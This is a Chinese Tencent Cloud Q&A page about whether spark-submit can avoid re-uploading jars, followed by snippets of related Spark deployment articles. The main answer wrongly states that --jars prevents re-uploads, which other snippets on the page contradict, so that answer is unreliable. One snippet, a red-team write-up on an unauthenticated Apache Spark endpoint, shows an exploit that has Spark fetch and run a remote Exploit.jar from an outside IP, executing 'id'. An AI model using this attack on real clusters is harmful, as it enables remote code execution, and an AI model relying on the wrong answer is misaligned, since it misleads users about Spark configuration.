文章/答案/技术大牛

发布

spark-submit:我能告诉spark不要每次都重新上传jars吗？

在Spark中，可以通过使用--jars选项来告诉Spark不要每次都重新上传JAR文件。spark-submit是用于提交Spark应用程序的命令行工具。

--jars选项允许您指定一个包含依赖JAR文件的逗号分隔列表。当您提交Spark应用程序时，Spark将自动将这些JAR文件分发到集群的每个节点上，以供应用程序使用。

以下是使用--jars选项的示例命令：

spark-submit --class com.example.MyApp --master yarn --deploy-mode cluster --jars /path/to/dependency1.jar,/path/to/dependency2.jar /path/to/myapp.jar

在上面的命令中，--jars选项后面跟着依赖JAR文件的路径列表。您可以将多个JAR文件用逗号分隔开。这些JAR文件将被分发到集群的每个节点上，并在应用程序中可用。

通过使用--jars选项，您可以避免每次都重新上传JAR文件，从而提高应用程序的提交速度和效率。

腾讯云相关产品和产品介绍链接地址：

腾讯云容器服务（TKE）：https://cloud.tencent.com/product/tke
腾讯云弹性MapReduce（EMR）：https://cloud.tencent.com/product/emr
腾讯云云服务器（CVM）：https://cloud.tencent.com/product/cvm
腾讯云对象存储（COS）：https://cloud.tencent.com/product/cos

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

spark on yarn 如何集成elasticsearch

将整个依赖打成一个fat的jar，这样所有的依赖都会在一个jar包，这样的好处就是一个jar包包含所有依赖，不需要额外考虑依赖的问题，但是弊端也非常明显如果依赖多的话jar包的体积会非常大超过100M都很正常，每次代码有小的变更都需要重新编译上传...，只会提交核心代码，共享的依赖用在变化，这样的好处就是动静分离，核心代码体积非常小，只有只kb，每次编译重新打包上传linux运行速度非常快，依赖的jar虽然体积比较大，数量多但是我们只需要第一次将其全部收集到一个公共目录即可...在使用spark集成es时候，我使用的是上面的第二种方法，下面看下如何使用，集成es的jar包如下：这里需要解释一下依赖jar包如何在spark中提交，大多数时候我们直接使用spark-submit...最终提交spark任务到yarn集群上的命令如下： spark这个集成相关依赖时，还是比较简单的，大部分时候我们使用--jars都能非常轻松的解决依赖问题，少数时候需要在每一台spark机器上上传...jar包，除此之外在使用maven打包的时候散仙推荐使用第二种，不要把依赖和核心代码耦合在一个jar里，最好能分离，这样核心代码的体积会非常小方便调试。

1.2K6 0

聊聊spark-submit的几个有用选项

，我们往往会使用spark-submit的选项来进行传递。...那么这些资源和信息，在使用spark-submit指定了之后，都去了哪里呢，为什么远在机房的driver和executor能正确的读到这些东东呢？...为什么我明明按照spark-submit的帮助信息指定了这些东西，但是driver或者executor还是报错呢？本篇文章提供一个方法帮大家进行相关问题的定位。...，而且依赖比较多的话，我们的打包过程也会很慢，手动把这个包上传到服务器也会很慢，这就拖慢了我们的整个测试和验证流程，所以我们可以使用--jars这个选项，来让spark计算框架帮我们把需要的依赖进行分发...妈妈再也不用担心我跑spark时找不到类啦！

2.5K3 0

Spark SQL+Hive历险记

的版本，我这里是2.11.7 （2）下载spark-1.6.0源码，解压进入根目录编译（3）dev/change-scala-version.sh 2.11 修改pom文件，修改对应的hadoop...--master spark://h1:7077 examples/target/spark-examples_2.11-1.6.0.jar 100 bin/spark-submit --class...记住一个血的bug，在代码里的SparkConf()一定不要setMaster("")的值，否则你粗心了，在集群上执行各种模式时候会出现莫名其妙的bug //写代码方式，查询 Java代码.../这是主体的jar，不用跟--jars放在一起，否则会有问题 //yarn客户端模式 bin/spark-submit --class com.tools.hive.SparkHive..._2.11-1.0.jar //这是主体的jar，不用跟--jars放在一起，否则会有问题 //spark alone模式 bin/spark-submit --class com.tools.hive.SparkHive

1.3K5 0

Spark快速入门系列(2) | Spark 运行模式之Local本地模式

解压 Spark 安装包 1. 把安装包上传到/opt/software/ ? 2....把安装包上传到/opt/module/ [bigdata@hadoop002 software]$ tar -zxvf spark-2.1.1-bin-hadoop2.7.tgz -C /opt/module...重命名为spark-local(为了方便复制一个并重新命名) [bigdata@hadoop002 module]$ cp -r spark-2.1.1-bin-hadoop2.7 spark-local.../examples/jars/spark-examples_2.11-2.1.1.jar 100 注意: 如果你的shell是使用的zsh, 则需要把local[2]加上引号:'local[2]'...说明: 使用spark-submit来发布应用程序. 2.1 spark-submit语法 .

4.5K2 1

spark jobserver源码导读

最近有人问浪尖，想读一个比较大的spark项目源码，问浪尖要，浪尖只能告诉你业务相关的是基本上不会有人开源，平台相关的源码就比较多了，浪尖比较推荐的是Spark JobServer相关的源码。...分割 jar 上传步骤以提高 job 的启动速度 8. 异步和同步的 job API，其中同步 API 对低延时作业非常有效 9. 支持Standalone Spark和Mesos、yarn 10..../server_start.sh --jars cassandra-spark-connector.jar # # Environment vars (note settings.sh overrides...> $PIDFILE else eval $cmd fi 可以看到熟悉的spark-submit,入口函数就是spark.jobserver.JobServer的main函数，浪尖就不在这里展开了...spark jobserver的大致架构如下图所示，大家也可以参照下图所示的思路提示去阅读，球友的话也可以去星球里找寻我周么发出来的提示。 ?

9231 0

Spark部署模式与作业提交

一、作业提交 1.1 spark-submit Spark 所有模式均使用 spark-submit 命令提交作业，其格式如下： ....# Jar 包路径 [application-arguments] #传递给主入口类的参数需要注意的是：在集群环境下，application-jar 必须能被集群中所有节点都能访问...，可以是 HDFS 上的路径；也可以是本地文件系统路径，如果是本地文件系统路径，则要求集群中每一个机器节点上的相同路径都存在该 Jar 包。...your cluster UI to ensure that workers are registered and have sufficient resources 这时候可以查看 Web UI，我这里是内存空间不足...2.4.0-bin-hadoop2.6/examples/jars/spark-examples_2.11-2.4.0.jar \ 100 # 以cluster模式提交到yarn集群 spark-submit

8033 0

Spark的那些外部框架

Spark试图解决的问题涵盖的面很广，跨越了很多不同领域，使用这些框架能帮助降低初始开发成本，充分利用开发人员已有的知识。...http://spark-packages.org/ 当你想用一个Spark package时，可以在spark-submit命令或者spark- shell命令中增加包选项： $ $Spark_HOME...（2）选择运行在spark-jobserver上的主类。提交job时不需要每次都编写Spark应用或者编译它，即使你想与其他人共享。...spark-jobserver会对如下对象持久化： job状态 job配置 JAR 因此，一旦你设置了这些信息，就不需要再次重新上传。...得到的结果也能通过REST API下载。

1.3K1 0

YARN & Mesos，论集群资源管理所面临的挑战

另外，都引入Tachyon作为缓存层，SSD作为shuffle的落地存储。如果用Mesos调度，我们对Hadoop版本的依赖就降低了。Hadoop升级风险有点高。这算是我们遇到的最大的一个坑了。...我这里关于YARN的吐槽就这么多，其余的使用Spark的坑，后边有机会再说吧。...Spark通过spark-submit向YARN集群提交job，在不修改spark相关启动脚本的情况下，下列因素决定了spark-submit提交的任务的classpath（可能有遗漏，请补充）。...Executor的class加载远比Driver端要复杂，我这里不详细说了，有兴趣的同学可以去看看spark-yarn模块的代码。...另外就是如果集群有任何的异常，建议一定要先看LOG，LOG基本上可以告诉我们所有的事情。

8305 0

2021年大数据Spark（十）：环境搭建集群模式 Spark on YARN

所以很多计算框架,都主动支持将计算任务放在Yarn上运行,如Spark/Flink 企业中也都是将Spark Application提交运行在YANR上，文档： http://spark.apache.org...1.需要Yarn集群:已经安装了 2.需要提交工具:spark-submit命令--在spark/bin目录 3.需要被提交的jar:Spark任务的jar包(如spark/example/jars中有示例程序...scp -r log4j.properties root@node3:$PWD 配置依赖Spark Jar包当Spark Application应用提交运行在YARN上时，默认情况下，每次提交应用都需要将依赖...Spark相关jar包上传到YARN 集群中，为了节省提交时间和存储空间，将Spark相关jar包上传到HDFS目录中，设置属性告知Spark Application应用。...## hdfs上创建存储spark相关jar包目录 hadoop fs -mkdir -p /spark/jars/ ## 上传$SPARK_HOME/jars所有jar包 hadoop fs -

4.2K2 0

Spark——底层操作RDD,基于内存处理数据的计算引擎

目录下的 spark-submit来提交(在那一个节点都可以,命令都如下,不会改变) # ....指定的依赖的jar包，客户端提交任务后，spark任务节点的spark安装目录jars目录下的所有jar包以__spark_libs__5619457283046496725.zip的形式上传到这个路径下...如果spark_home/jars目录下的jar包很多，会上传很久，导致任务执行很慢，可以通过在客户端spark_home/conf/spark-defaults.conf中配置spark.yarn.jars...目录下，这样每次提交任务时，就不会从客户端的spark_home/jars下上传所有jar包，只是从hdfs中sparkjars下读取，速度会很快，省略了上传的过程。...提交任务时，不将所有的依赖jar包打入一个jar包，可以使用—jars来指定，但是每次指定的jar包会上传到hdfs中/user/${username}/.sparkStaging/application-xxx

2.4K2 0

YARN & Mesos，论集群资源管理所面临的挑战

我这里关于YARN的吐槽就这么多，其余的使用Spark的坑，后边有机会再说吧。...Spark通过spark-submit向YARN集群提交job，在不修改spark相关启动脚本的情况下，下列因素决定了spark-submit提交的任务的classpath（可能有遗漏，请补充）。...的class加载远比Driver端要复杂，我这里不详细说了，有兴趣的同学可以去看看spark-yarn模块的代码。...另外就是如果集群有任何的异常，建议一定要先看LOG，LOG基本上可以告诉我们所有的事情。...其实在Spark出来的时候Mesos远比YARN稳定，而且也是伯克利自己的东西，支持的力度很大。目前Spark里面Mesos和YARN都支持两种调度模式，client和cluster。

9948 0

【Spark数仓项目】需求一：项目用户数据生成-ODS层导入-DWD层初步构建

我们所使用的依赖也需要全部打包进jar包上传到服务器，使用插件可以完成将所有依赖打包的操作。上述事项只需要复制前文中我整理好的依赖管理即可正常打包使用，完整jar包大约293M。...打包成功截图： jar包上传到服务器服务器提交命令： [root@hadoop10 app]# spark-submit --master yarn --class com.yh.ods_etl.AppLogWash...这个警告信息表明在提交Spark应用程序时，没有明确指定spark.yarn.jars或spark.yarn.archive参数，导致Spark将依赖的库文件上传到SPARK_HOME目录下。...2.解决了每次都要打包上传大文件依赖的问题，将--jars /opt/app/spark-dw-jar-with-dependencies.jar进行指定。 #!...\ --class com.yh.ods_etl.AppLogWash_01 \ --conf spark.yarn.jars=local:/opt/installs/spark3.2.0/jars

1681 0

docker下，极速搭建spark集群(含hdfs集群)

搭建spark和hdfs的集群环境会消耗一些时间和精力，处于学习和开发阶段的同学关注的是spark应用的开发，他们希望整个环境能快速搭建好，从而尽快投入编码和调试，今天咱们就借助docker，极速搭建和体验...用浏览器查看hdfs，如下图，可见txt文件已经上传到hdfs上： ?...文件所在目录下，有个jars目录，进入此目录执行以下命令，就会将实战用到的jar文件下载到jars目录： wget https://raw.githubusercontent.com/zq2599/blog_demos...-it master spark-submit \ --class com.bolingcavalry.sparkwordcount.WordCount \ --executor-memory 512m...集群，调整参数榨干硬件》；至此，docker下的spark集群的搭建和体验我们都快速完成了，希望此文能助您快速搭建环境，聚焦业务开发；

2.3K3 0

【问底】许鹏：使用Spark+Cassandra打造高性能数据分析平台（一）

3.2.1 driver的配置使用spark-cassandra-connector的时候需要编辑一些参数，比如指定Cassandra数据库的地址，每次最多获取多少行，一个线程总共获取多少行等。...但在执行阶段问题就会体现出来，即程序除了spark-cassandra-connector之外还要依赖哪些文件呢，这个就需要重新回到maven版本库中去看spark-cassandra-connector...3.3.4 Spark-submit spark集群运行正常之后，接下来的问题就是提交application到集群运行了。...所依赖的包，多个包之间用冒号(:)分割 --jars driver和executor都需要的包，多个包之间用逗号(,)分割为了简单起见，就通过—jars来指定依赖，运行指令如下 $SPARK_HOME.../bin/spark-submit –class 应用程序的类名 \ --master spark://master:7077 \ --jars 依赖的库文件 \ spark应用程序的jar包 3.3.5

2.7K8 0

某大厂红队评估_之_Apache Spark打点

某大厂红队评估_之_Apache Spark打点打点发现团队一起做项目，同事发现一个Apache Spark未授权页面，我这边尝试打点，遂有此文初次尝试目标地址： http://182.61...."Exploit", "sparkProperties": { "spark.jars": "https://github.com/aRe00t/rce-over-spark/raw/master.../spark-submit --master spark://192.168.202.128:7077 --deploy-mode cluster --class Exploit http://101.200....xx.xx:8000/Exploit.jar id 本地调试 spark-submit下载链接：https://archive.apache.org/dist/spark/spark-2.4.3/spark...-2.4.3-bin-hadoop2.7.tgz （这里记录一下：下载spark-submit时不要下载源码包，要下载二进制安装包，否则会报错）查看执行结果还是通过上述方式，发现成功执行了命令

9751 0

Spark 面试题系列-1

1 Spark为什么快，Spark SQL 一定比 Hive 快吗 Spark SQL 比 Hadoop Hive 快，是有一定条件的，而且不是 Spark SQL 的引擎比 Hive 的引擎快，相反，...每次启动 JVM 的时间可能就需要几秒甚至十几秒，那么当 Task 多了，这个时间 Hadoop 不知道比 Spark 慢了多少。...窄依赖的失败恢复更有效，因为它只需要重新计算丢失的 parent partition 即可，而且可以并行地在不同节点进行重计算（一台机器太慢就会重新调度到多个节点进行）。...这也是部署、设置最简单的一种模式，所有的 Spark 进程都运行在一台机器或一个虚拟机上面。 Standalone: Standalone 是 Spark 自身实现的资源调度框架。...\ /tmp/spark-2.2.0-bin-hadoop2.7/examples/jars/spark-examples_2.11-2.2.0.jar \ 100 其中 master:7077

1.1K1 0

Spark 系列教程（2）运行模式介绍

节点都注册到 Zookeeper 上了，并且此时 192.168.1.117 hadoop1 这个节点是 Master。...Spark HA 测试完成，重新启动 hadoop1 节点的 Master 进程。.../spark-operator --untar 修改 values.yaml 文件中有以下两个地方需要修改： 1.repository 镜像仓库地址，由于国内拉取 Spark 相关镜像速度较慢，我已经提前下载好镜像并且上传至阿里云镜像仓库中了...，大家可以直接使用我的镜像。...构建并上传镜像将 jar 包放到 Spark 安装包的 examples/jars 目录中，进入 Spark 目录然后执行以下命令构建镜像。

1.6K3 0

腾讯云 EMR 常见问题100问（持续更新）

local/service/oozie/conf/oozie-site.xml 修改完重启下进程会生效，可以直接kill，监控会自动拉起问题3：请问客户购买EMR的时候没有选择HBASE,现在想用是要重新购买吗...答：可以备份后迁移问题8：请问如何将第三方的jar 自动化的包分发到每个node的hive的lib 下面，下面是在hive客户端导入bson 之后出现的问题：我现在需要用到superset这样的...和hive.aux.jars.path（HIVE以及OOZIE添加第三方JAR包的方法）问题9：请问如何在非集群的机器上把 spark-submit 任务给集群？...答：hbase有自带的通用export和import工具问题20：spark-submit emr的组件的安装目录在哪里？...答：spark-submit emr的组件是安装装/usr/local/service/spark下问题21：想修改dfs.data.dir的路径可以么答：dfs.data.dir属于敏感字段，不提供用户自定义修改

5.5K4 2

进击大数据系列（八）Hadoop 通用计算引擎 Spark

平均快10倍以上的计算速度；因此Spark能更好地适用于数据挖掘与机器学习等需要迭代的MapReduce的算法。...重新执行任务 bin/spark-submit \ --class org.apache.spark.examples.SparkPi \ --master spark://linux1:7077...，所以，开发时都配置历史服务器记录任务运行情况。...重新启动集群和历史服务 sbin/start-all.sh sbin/start-history-server.sh 重新执行任务 bin/spark-submit \ --class org.apache.spark.examples.SparkPi...collect方法会将 jdbcDF 中的所有数据都获取到，并返回一个 Array 对象。

4412 0

Spark历险记之编译和远程任务提交

主角 7 Intillj IDEA 开发IDE 8 SBT scala-spark专属打包构建工具 9 Centos6或Centos7 集群运行的Linux系统这里Hadoop已经安装完毕，并且能正常工作...我这里用的是spark1.4.0的版本，所以只能用scala2.11.x的版本，这就需要重新编译spark了，另一个原因也需要和对应的haodop版本编译对应。...模式 bin/spark-submit --class org.apache.spark.examples.SparkPi --master spark://Hadoop-1-231:7077 examples.../spark-submit --class org.apache.spark.examples.SparkPi --master yarn-client examples/target/spark-examples...大多数的情况下，你都需要把你的程序打包成一个jar，然后上传到Linux上，然后在执行测试，这样非常麻烦，你频繁改代码就意味着，你得不断的打包，上传，打包，上传，这跟hadoop的调试是一样的。

2K9 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

spark-submit:我能告诉spark不要每次都重新上传jars吗？

相关·内容

spark on yarn 如何集成elasticsearch

聊聊spark-submit的几个有用选项

Spark SQL+Hive历险记

Spark快速入门系列(2) | Spark 运行模式之Local本地模式

spark jobserver源码导读

Spark部署模式与作业提交

Spark的那些外部框架

YARN & Mesos，论集群资源管理所面临的挑战

2021年大数据Spark（十）：环境搭建集群模式 Spark on YARN

Spark——底层操作RDD,基于内存处理数据的计算引擎

YARN & Mesos，论集群资源管理所面临的挑战

【Spark数仓项目】需求一：项目用户数据生成-ODS层导入-DWD层初步构建

docker下，极速搭建spark集群(含hdfs集群)

【问底】许鹏：使用Spark+Cassandra打造高性能数据分析平台（一）

某大厂红队评估_之_Apache Spark打点

Spark 面试题系列-1

Spark 系列教程（2）运行模式介绍

腾讯云 EMR 常见问题100问（持续更新）

进击大数据系列（八）Hadoop 通用计算引擎 Spark

Spark历险记之编译和远程任务提交

扫码

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐